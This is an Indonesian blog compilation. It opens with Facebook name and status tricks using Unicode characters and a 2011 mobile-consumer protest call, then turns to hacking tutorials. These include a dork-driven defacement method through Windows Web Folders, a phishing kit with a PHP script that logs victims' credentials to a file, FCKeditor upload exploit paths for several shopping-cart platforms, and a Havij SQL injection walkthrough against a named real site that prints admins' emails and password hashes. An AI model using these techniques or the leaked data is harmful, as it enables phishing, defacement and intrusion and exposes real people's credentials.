0 Update Status Via BlackBerry Asli

Anonim mengatakan :
Pengennya Update Status Via BlackBerry tapi Ketahuan deh kalo Statusku  bukan dari Smartphone Blackberry alias pakek Fanpage Aplication
ada solusi gak ya...???

LANGSUNG UPDATE DI FACEBOOK YUUK BIAR GAK RIBET

______________________________________________

setelah Mendapatkan BB baru, sedikit ada celah membuat perbedaan...!!!

gak punya BB tapi Pengen Update Status layaknya kita Punya BB (alias tidak memakai Aplikasi Buatan)

Disini Solusinya dan hilangkan gengsi agan agin disini...!!!

Berikut adalah Aplikasi Asli dari Blackberry
gak bakal ketahuan kalo agan agin gak punya BB

0 NAMA KAPITAL

UNTUK SAAT INI HANYA KARAKTER BERIKUT 

YANG BISA DIPAKAI DAN JADI ALTERNATIF 

HURUF KAPITAL..!!

Ά Έ Ή Ί Ό Ύ

Α Β Ѕ Ε Ν Ζ Η Ι Κ Μ Ν Ο Ρ Τ Χ Υ 

Ξ Λ

· 

Atau pisah dengan tanda titik diatas

contoh :

Dengan Format Biasa :

Contoh : 

NAMA PERTAMA :ΜΥ

NAMA TENGAH :ΗΟ

NAMA TERAKHIR : ΜΕ

Atur Sendiri Nama Kalian Dengan Kreasi Kalian Sendiri

Silahkan Rangkai Nama Kalian

Nah Kalo Kalian Mau Ganti Dengan Karakter Unik Klik Ini

This

NB : Kalo Misalnya Gak Ganti nama Waktu Lagi Proses , Lo Harus Ke Pengaturan Akun Dulu Trus Ganti nama Dengan Nama yang Sebelumnya Udah Pernah kita Pakek 

0 Karakter lain untuk merubah nama facebook

 ________________________________________
Karakter dibawah adalah karakter yang bisa diterima untuk mengganti nama Facebook
alangkah lebih uniknya jika kita mengulang karakter karakter tersebut, namun jika tidak berhasil sebaiknya menggunakan 2 atau 3 karakter
contoh :
ވވވވވވވވވ(satu karakter)
ઉઊ (dua karakter)
dan seterusnya
dan carilah karakter tersebut di Aplikasi Character Map didalam Komputer anda atau langsung aja copas
_________________________________________________________

" GAUTAMI "

అ ఆ ఇ ఈ ఉ ఊ ఋ ఌ ఎ ఏ ఐ ఒ ఓ ఔ క ఖ గ ఘ ఙ చ ఛ జ ఝ ఞ ట ఠ డ ఢ ణ త థ ద ధ న ప ఫ బ మ య ర ఱ ల ళ వ శ ష స హా

contoh :
అఅఅఅఅఅఅఅఅఅఅఅఅఅఅఅఅఅ

_________________________________________________________

"MV boli"

ހށނރބޅކއވމފދތލގޏސޑޒޓޔޕޖޗޘޙޚޛޜޝޞޟޠޡޢޣޤޥ

contoh :

ކއކއކއކއކއކއކއކއކއކއކއކއ

ބބބބބބބބބބބބބބބބބބ

 ހހހހހހހހހހހހހހހހހހހހހހ

ވވވވވވވވވވވވވވވވވވވވވވވވވވވވ

ޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥ

 

_________________________________________________________

"Sylfaen" 

ﬗ ﬖ ﬕ ﬔ ﬓ ჵ ჴ ჳ ჱ ჰ წ ძ ც ჩ შ ყ ღ ქ ფ ტ უ ს რ ჟ პ ო ნ ო მ ლ დ լ ի ժ թ ը է զ ե դ գ բ ա

Contoh :
ﬗﬖﬕﬔﬓ

_________________________________________________________

"Shruti "

અ આ ઇ ઈ ઉ ઊ ઋ ઍ એ ઐ ઑ ઓ ઔ ક ખ ગ ઘ ઙ ચ છ જ ઝ ઞ ટ ઠ ડ ઢ ણ ત થ દ ધ ન પ ફ બ ભ મ ય ર લ ળ વ શ ષ સ હ ૧ ૨ ૩ ૪ ૫ ૬ ૭ ૮ ૯

CONTOH :

ઉઊઉઊઉઊઉઊઉઊઉઊઉઊ
ઇઈઇઈઇઈઇઈઇઈઇઈઇઈ
_________________________________________________________

"Kozuka Mincho Pro M"

ぃ あ ぁ ぃ ぅ う ぇ え ぉ お か が き ぎ け げ こ ご さ さ ざ し じ す ず せ ぜ そ ぞ た
だ ち っ ぢ ゑ ゐ わ ゎ ろ れ る り ら よ ょ ゆ ゅ ゃ も め む み ま ぽ ほ ぼ
ぷ ぶ ふ ぴ び ひ ぱ ば は の  ね ぬ に な ど と で て を ん
ゔ ゕ ゖ ゝ ゞ ゟ ァ ア  ィ イ ゥ ウ ェ エ ォ
オ カ キ ガ ヌ ニ ぃ ニ   ナ ド ド ト
テ ヅ ヂ チ ロ レ ル リ ラ ヨ
 ョ ユ ュ ヤ ャ モ
メ ム ミ マ
ポ ボ  ホ
 
 
Contoh

モエとこムウ
ロニロニ
ミロミ
ニロミ
ニニニロニニニ
ニミニミニ
ニ囗ニ囗ニ
ニエニエニ
ニぃニぃニぃニぃニ
ゝミゞ 
_________________________________

" MANGAL " 

अ आ इ ई उ ऊ ऋ ऌ  ऍ ऎ ए ऐ ऑ ऒ ओ औ क ख ग घ ङ च छ  ज झ ञ ट ठ ड  ढ ण त थ द  ध न ऩ प फ ब भ म  य र ऱ ल ळ  ऴ व श ष स  ह ॐ क़ ख़ ग़ ज़ ड़ ढ़ फ़ य़ ॠ ॡ 

contoh :
ळठळठळठळठळठळठळ

ळळळळळळळळळळळळ 
_________________________________

" LATHA " 

அ ஆ இ ஈ உ ஊ எ ஏ ஐ ஒ ஓ ஔ க ங ச ஜ 

ஞ ட ண த ந ன ப ம ய ர ற ல ள ழ வ ஷ ஸ

ஹை ௧ ௨ ௩ ௪ ௫ ௬ ௭ ௮ ௯ ௰ ௱ ௲

contoh : 

டப டப

இஇஇஇஇஇஇஇஇ

ஹைஹைஹைஹைஹை 

Atur Sendiri Nama Kalian Dengan Kreasi Kalian Sendiri

Silahkan Rangkai Nama Kalian

Nah Kalo Kalian Mau Ganti Dengan Karakter Unik Klik Ini

This

NB : Kalo Misalnya Gak Ganti nama Waktu Lagi Proses , Lo Harus Ke Pengaturan Akun Dulu Trus Ganti nama Dengan Nama yang Sebelumnya Udah Pernah kita Pakek 

sekarang kita sampai pada font kecil dan nama yang kelihatannya seperti mata...!!!

seperti apa sih???

check aja langsung yuuuuuuukkkkkk..!!

UNTUK MENGCOPY BLOCK HURUFNYA KEMUDIAN Ctrl+C (Keyboard)

___________________________________

 

а в г е к м н о р с т у х ь ѕ і ј

_____________________________________________________

kombinasi dengan karakter sejenis..!!

ф а в г д е ж и й к л м н о п р с т у х ц

ч ҝ ң ќ ћ љ ј ї і ѕ ѓ ђ я э х ш щ ң ҝ ң ғ җ

њ ҳ ю ь ы ъ ц ч

 

фавгд

ќамаңоф

_____________________________________________________

Kombinasikan karakter berikut sesuka kalian...!!!

ܐ ܒ ܓ ܔ ܕ ܖ ܗ ܘ ܙ ܚ ܛ ܜ ܝ ܞ ܟ

ܡ ܬ ܫ ܪ ܩ ܨܧ ܦ ܥ ܤ ܣ ܢ ܡ ܠ

ܰ ܱ ܲ ܳ ܴ ܵ ܶ ܷ ܸ ܹ ܺ ܻ ܼ ܿ ݀ ݁ ݂ ݃ ݄ ݅ ݆ ݇ ݈

contoh :

ܝܿ

ܝܼ

ܓܝܐܰܖܓܝܐܰܖ

ܓܐܢܦܧܙܓܐ

ܡܝܐܰ ܡܝܐܰ

ܒܝܐܰ ܒܝܐܰ

ܛܝܐܰ ܛܝܐܰ

ܥܝܐܰ ܥܝܐܰ

ܗ݃

ܙܲܙܲ

ܙܲ

ܦܧܦܧܦܧ

 ܒܠܫܐܫܐ

_____________________________________________

ADA SATU YANG LUPA....!!!

karakter dibawah ini bebas dipanjangin mau sampek sabang hingga merauke...!!

ε ζ ζ η θ ι κ λ μ ν ξ ο ρ ς 

σ τ υ φ χ ψ ω ϊ ϋ ό ύ ώ

Atur Sendiri Nama Kalian Dengan Kreasi Kalian Sendiri

Silahkan Rangkai Nama Kalian

Nah Kalo Kalian Mau Ganti Dengan Karakter Unik Klik Ini

This

NB : Kalo Misalnya Gak Ganti nama Waktu Lagi Proses , Lo Harus Ke Pengaturan Akun Dulu Trus Ganti nama Dengan Nama yang Sebelumnya Udah Pernah kita Pakek 

0 KARAKTER NAMA FACEBOOK TERANEH

WOWWWWWW......!!!

Kali ini ternyata masih ada karakter yang dapat kelabuhi masbul alias fazbuk alias bisbul...!!

wkwkwkwkwkw apa aja boleh

check it out yuuk....G7 mania...!!

_____________________________________________

Ѷѷ 

҆

҅
҃
҄ 

Ѳѳ

Ѯѯ 

Ѱѱ

Ѧѧ

Ѩѩ

Ѫѫ

Ѭѭ 

ѽѼ

҉

҈

Berikut adalah kombinasi nama depan dan belakang yang valid :

Ѷ҈҅҆҅҆҅҆҅҆҅҆҅҆

ѽ҅҆҅҆҅҆҅҆҅҆҅҆҈Ѷ

Ѳ҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅

Ѳ҆҆҆҆҆҆҆҆҆҆҆҆҆҆҆҆҆҆Ѳ

Ѳ҅҅҅҉҅҅҅҅҉҅҅҅҅҅҅҅ѽ҅҅҅҅҅

Ѽ҆҆҆҆ѽ҆҆҆҆҆҉҆҆҆҆҉҆҆҆҆҆Ѳ

Ѧ҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅

Ѫ҆҆҆҆҆҆҆҆҆҆҆҆҆҆҆҆҆҆ѱ

Ѯ҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅҅

Ѩ҆҆҆҆҆҆҆҆҆҆҆҆҆҆҆҆҆҆Ѭ

Ѳ҃҃҉҃҃҃҃҉҃҃҃҃҃ѽ҅҅҅҅҅

Ѽ҅҅҅҅҅ѽ҃҃҃҃҃҉҃҃҃҃҉҃҃Ѳ

Ѳ҄҄҉҄҄҄҄҉҄҄҄҄҄ѽ҃҃҅҅҃҃

Ѽ҃҃҅҅҃҃ѽ҄҄҄҄҄҉҄҄҄҄҉҄҄Ѳ

 

Atur Sendiri Nama Kalian Dengan Kreasi Kalian Sendiri

Silahkan Rangkai Nama Kalian

Nah Kalo Kalian Mau Ganti Dengan Karakter Unik Klik Ini

This

NB : Kalo Misalnya Gak Ganti nama Waktu Lagi Proses , Lo Harus Ke Pengaturan Akun Dulu Trus Ganti nama Dengan Nama yang Sebelumnya Udah Pernah kita Pakek 

0 Mengganti nama facebook jadi aneh, panjang, simple dan unik

naaaaaahhh...!!

sekarang sudah saatnya kita ganti nama kita,
yah... walau gak sebebas dulu, 
tapi paling tidak kita bisa memodifikasi 
nama kita biar kerenean dikiiit..!!!

INGAT JIKA TIDAK MUNCUL GANTI NAMA
SEBAIKNYA GANTI DULU DENGAN NAMA KITA YANG LAIN
(DI PENGATURAN AKUN)
SEBELUM MELAKUKAN PROSES BERIKUT



Langsung Saja..!!

Klik AMANKAN AKUN  :

KEMUDIAN AKAN MUNCUL SEPERTI GAMBAR BERIKUT

ikuti langkah - langkahnya hingga muncul seperti gambar di bawah :

ganti nama kita yang lawas dengan jenis font "halfwidht fullwidth" atau langsung copas huruf dibawah ini :

FONT “halfwidht fullwidth”.

Ａ	Ｂ	Ｃ	Ｄ	Ｅ	Ｆ	Ｇ	Ｈ	Ｉ	Ｊ	Ｋ	Ｌ	Ｍ
Ｎ	Ｏ	Ｐ	Ｑ	Ｒ	Ｓ	Ｔ	Ｕ	Ｖ	Ｗ	Ｘ	Ｙ	Ｚ
ａ	ｂ	ｃ	ｄ	ｅ	ｆ	ｇ	ｈ	ｉ	ｊ	ｋ	ｌ	ｍ
ｎ	ｏ	ｐ	ｑ	ｒ	ｓ	ｔ	ｕ	ｖ	ｗ	ｘ	ｙ	ｚ

 Nah Kalo Kalian Mau Ganti Dengan Karakter Unik Klik Ini

This

NB : Kalo Misalnya Gak Ganti nama Waktu Lagi Proses , Lo Harus Ke Pengaturan Akun Dulu Trus Ganti nama Dengan Nama yang Sebelumnya Udah Pernah kita Pakek 

 

 

0 Matikan HP Pada Tanggal 15 Oktober !

Setelah melihat langsung Rapat antara para Operator Seluler, BRTI, Kemenkominfo dan Komisi I di Gedung DPR-RI, 10 Oktober 2011, di mana para pemegang kebijakan ternyata tidak memiliki kebijakan untuk menangani kejahatan pencurian pulsa. Maka, dengan ini, kami menyerukan:

1. Bubarkan BRTI…!

2. Luncurkan SIM Card bebas iklan..!

3. Matikan HP Anda pada tanggal 15 Oktober 2011 pukul 10.00 - 12.00 WIB sebagai hari bebas ponsel dan sebagai protes konsumen Indonesia pada para pihak di atas. Kami konsumen ponsel berhak untuk mematikan HP kami kapanpun. Tetapi jika seluruh Indonesia mematikan HP-nya serentak, para operator akan tahu akibatnya.

Tertanda,

Konsumen ponsel Indonesia

Komunitas Voice of Humanism

Kompasianer & Kaskuser

(Sebarkan seluas-luasnya demi konsumen ponsel Indonesia..!!)

---------------
Ini saya kasih penjelasannya:

1. Bubarkan BRTI…!

Alasannya karena BRTI dibentuk oleh Undang-undang Nomor 36 Tahun 1999 tentang Telekomunikasi. Undang-undang dalam sebuah Negara demokrasi poros utamanya adalah rakyat. Ini basic dari pemikiran demokrasi yang disetujui oleh berbagai pihak. Pengaduan ke BRTI menurut laporan dari pihak BRTI sendiri sudah lebih dari 9000 laporan. Tetapi masih terus berlanjut kasus-kasus tersebut. BRTI pun dibiayai oleh APBN artinya uang rakyat. Maka, jika BRTI tidak bisa menuntaskan masalah rakyat berarti telah gagal. Maka kami serukan untuk bubarkan. Jika tidak ingin dibubarkan kerja yang baik. Ini masalah sebab-akibat. Hukum alam.

2. Luncurkan SIM Card bebas iklan..!

Konsumen Indonesia membayar mahal biaya pulsa dibanding dengan Negara-negara lain. Kenapa harus ada iklan lagi? Menurut penelitian yang dilakukan oleh mahasiswa UGM iklan di HP itu mengganggu, informative pun tidak, kredibilitasnya tidak dijamin, dan tidak ada factor hiburannya. Karena hanya berupa pesan singkat. Paradigma bisnisnya seharusnya dirubah ke arah “The power of Freemium”. Google sebagai perusahaan raksasa dunia tidak pernah membebankan biaya ke konsumennya. Baru dia pasang iklan. Ini kita bayar mahal tetapi harus ada iklan-iklan yang tidak perlu. Kebebasan adanya content provider silahkan saja, tetapi sajikan juga SIM Card yang bebas iklan. Konsumenlah yang pilih nantinya. Jangan semua ditarik biaya mahal diberikan iklan juga. Ini namanya pengerukan kekayaan rakyat yang terselubung.

3. Matikan HP Anda pada tanggal 15 Oktober 2011 pukul 10.00 - 12.00 WIB sebagai hari bebas ponsel dan sebagai protes konsumen Indonesia pada para pihak di atas. Kami konsumen ponsel berhak untuk mematikan HP kami kapanpun. Tetapi jika seluruh Indonesia mematikan HP-nya serentak, para operator akan tahu akibatnya.

Ini adalah semacam shock terapi. Dengan 2 jam kami sebagai konsumen ingin memberikan pelajaran bahwa konsumen jangan diremehkan. Kenapa tanggal 15 dan pukul 10.00 – 12, karena kami masih mempertimbangkan kepentingan konsumen. Tetapi jika tuntutan kami tidak digubris, maka akan diserukan lagi gerakan ini, tidak menutup kemungkinan nanti di peak hour atau seharian penuh. Jika 2 jam konsumen ponsel mematikan HP-nya secara serentak, operator akan kehilangan omset. Apalagi jika 1 hari penuh. Kenapa sasaran tembaknya operator, karena CP inangnya adalah operator. Ini ada main mata antara CP dengan operator. Dan kini saling berlepas tangan. Maka kita serbu ke jantungnya. Persis seperti anti kapitalisme di wall street, di jantungnya.

Hari ini (13 Okt 2011) jam 8.30 sudah wawancara live di TV One di Apa Kabar Indonesia Pagi. Besok jam 7 pagi di JakFM. Di detikinet..com dan di okezone.com juga sudah ada beritanya.

Mari berjuang untuk hak-hak kita yang dirampas...!!!! Ledakkan diri kita di dunia maya (kalau di dunia nyata meledakkan diri mati konyol)...berjayalah konsumen...!!!

0 Deface Melalui Web Folder (Wor On Win XP Only)

Langsung tanpa babis ..

StepByStep. Injection Versi Obieaja HNc

Dork : inurl:"~r00t.txt"

1. Buka Run --> Isi Dengan " %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F} "

2. setelah masuk ke "Web Folders", klick Kanan --> New --> Web Folder

3. cari target melalui Brows , dan kita di arah kan langsung ke google..

4. lalu masukkan dork yang telah diberikan tadi di search Google.com dan pilih lah target yang di inginkan.
CONTOH : " http://www.cnwxzl.com/r00t.txt "

5. lalu masukkan URL tadi ke dalam "Add Web Folder" --> Klick Next

6. setelah klick next --> klick Finish dan Hingga muncul Hasil Seperti ini...

7. Buka Foldernya dan Lalu Copykan File HTML anda kedalam Folder Tersebut.

Final . anda tinggal Double Klick File Yang anda copy tadi. Dan Hasilnya akan Wala !

0 Phising Site Apa Aja

qeqeqe ...
iseng2 gak ada kerjaan nemu tutor phising dari luar langsung aja dishare dimari ....
phising bisa buat situs apa aja, kaya rs, paypal dll ...

lanjut aje ye kita mulai ...

1. pilih site target yg mau dijadiin halaman phising
2. liat source codenya, klik kanan => source bisa juga ctrl+u trus save jadi index.htm
3. buka index.html yg tadi pake notepad, cari kata "action=" biasanya ketemu yg kaya gini

Scriptnya:

<form action="RANDOM URL" method="post">

4. ganti url "RANDOM URL" jadi write.php trus ganti "post" jadi get
5. save
6. bikin "write.php"

Scriptnya:

<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

7. ganti tulisan yg http://RANDOM diatas jadi alamat yg diphising misal http://facebook.com
8. save
9. upload deh dalam direktori yg sama ... ;))

sekian dari ane ...
btw repost gak yah ? klo repost delete aja ...
nb : chmod 777 di file password.txt

Oh iya ente harus punya hostingan ama domainya dlu (mau gratis ato bayar seretah !)

 CMIIW

0 Teknik Deface Full Version

Assalamualaikum..teman-teman.
Saya mau menampilkan lagi teknik deface :D
Kali ini, saya akan memberikan kpada anda smua teknikny.
Disini saya akan membahas 4 teknik deface yang mngkin di pakai defacer.
Saya termasuk Org yg anti mnggunkan tools pada saat mendeface website :D
Okay, lngsung aja....cekidot

1. Powered by CubeCard.

2. Powered By OpenCart

3. Powered By OscMax V 2.0

4. Connector Txt

1. Powered CubeCart

Adalah module Deface Upload file, kita bisa menggunakan cara ini.

Dork    : Powered By CubeCart V 3.0

Exploit :  /admin/includes/rte/editor/filemanager/browser/default/connectors/test.html 

Contoh: www.test.com/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html

2. Powered By OpenCart

Dork   :  Powered By OpenCart

Exploit:  admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

Contoh : www.asu.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

3. Powered By OscMax V 2.0

Dork    : Powered By OscMax V 2.0

Exploit : FCKeditor/editor/filemanager/browser/default/connectors/test.html

Contoh ;www.cekcu.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

4. Hacking TXt.

Hacking Txt ini sama saja dengan Konsep 3 di atas it, cuma bedany khusus fiile txt saja yg bisa di upload, bentuk file lain tdk akan mnerima :D 

Dork   : Inurl:/FCKeditor/editor/filemanager/

Exploit : /FCKeditor/editor/filemanager/browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

 

Semua yang saya tulis adalah dalam bntuk FCkeditor, khusus upload file :D

Cara pakainya:

1. Connector >> Pilih "PHP"

2. Klik Upload.

3. Jika Berhasil ada tulisa "file upload No eror"

4. Buka Get Folder utk mndptkan patch URL

5. Jika sudah, ketik nama file yg anda upload td.

Dan Wala , Hasilnya , oh iya cara melihat hasilnya tinggal klik Get Folder And File , Nanti Juga Di Kasih Tau Dari Sana

0 Sql injection Memakai Havij

 Havij Vers 1.10 , sebuah tool yang powerfull untuk mendapatkan akses admin dengan teknik sql injection.untuk mendownload silahkan klik Disini


okeh kalo udah di download langsung aja ke tutorial nya :


gunakan dork apa saja 


misal nya dork : inurl:index.php?page_id=


okeh berhubung tools ini buatan israel, saya akan Inject website milik israel juga !!!


Target :

http://www.xenia.co.il/index.php?page_id=93

jangan lupa tambahkan ' , sehingga menjadi http://www.xenia.co.il/index.php?page_id='93







sekarang kita jalankan Havij nya, copast target yg tadi ke kolom target pada Tools Havij



klik analyze


hasilnya:

Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id='93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia

w007s...... I Got the database... sekarang klik Tables lalu klik Get Tables







w007s..... I gOt the Tables from xeniaco_xenia database..
users_match 
users_fav 
params_parents 
params_pages 
params_icons 
params 
page_managers 
page_banned 
page_allowed 
nuke_users 
newsletter1 
main_access 
lpn_users_areas_maps 
lpn_users_areas 
ip_blocker 
gallery_auth_users 
form_datas 
enter_rules 
cat_tbl 
bep_users_target 
bep_users_cats 
bep_pics 
bep_other 
bep_news 
bep_links 
bep_html_data 
bep_files 
bep_data 
bep_banners 
bep_addons 
banners 
admins 
admin_titles 
WhoIsOnLineTbl 
WhoIsOnLineMessagesTbl 
Table1


Nah .. pada tahap ini, anda perlu cari tahu... dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users. 

Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm... 10 detik aja).



w007ss.... cool.. got to check it out... saya dapatkan kolom sbb

regdate
status 
regkey 
user_msg_to_mail 
mail_check_interval 
mail_pass 
mail_login 
mail_port 
mail_server 
user_level 
user_rank 
user_attachsig 
user_posts 
user_char 
newsletter 
counter 
commentmax 
theme 
ublock 
ublockon 
bio 
noscore 
thold 
uorder 
umode 
storynum 
apass 
pass 
user_cell 
user_homephone 
user_theme 
user_viewemail 
user_sig 
user_homepage 
user_from 
user_sign 
user_dob 
user_regdate 
user_avatar 
l_name 
femail 
email 
uname 
name uid
newsletter1 

nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website http://www.xenia.co.il.. sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm.... saya ceklis aja kolom :

name
email
pass
(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).

lalu klik Get Data dan



Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=àåãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff
w007s.... ternyata website ini memiliki 3 administrator...
hmmmm... passwordnya di HASH alias di-enkripsi..... no problem... havij juga punya md5 hash crack..

Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat.... 30 detik deh). lalu hasilnya




w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ... password berhasil di-crack.. sekarang tinggal cari halaman login.

Klik Find Admin lalu isi Path to search dengan http://www.xenia.co.il/ lalu klik start.... .... ............. Searching


Got that....
Page Found: http://www.xenia.co.il/login.php

Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan....
U gained an Access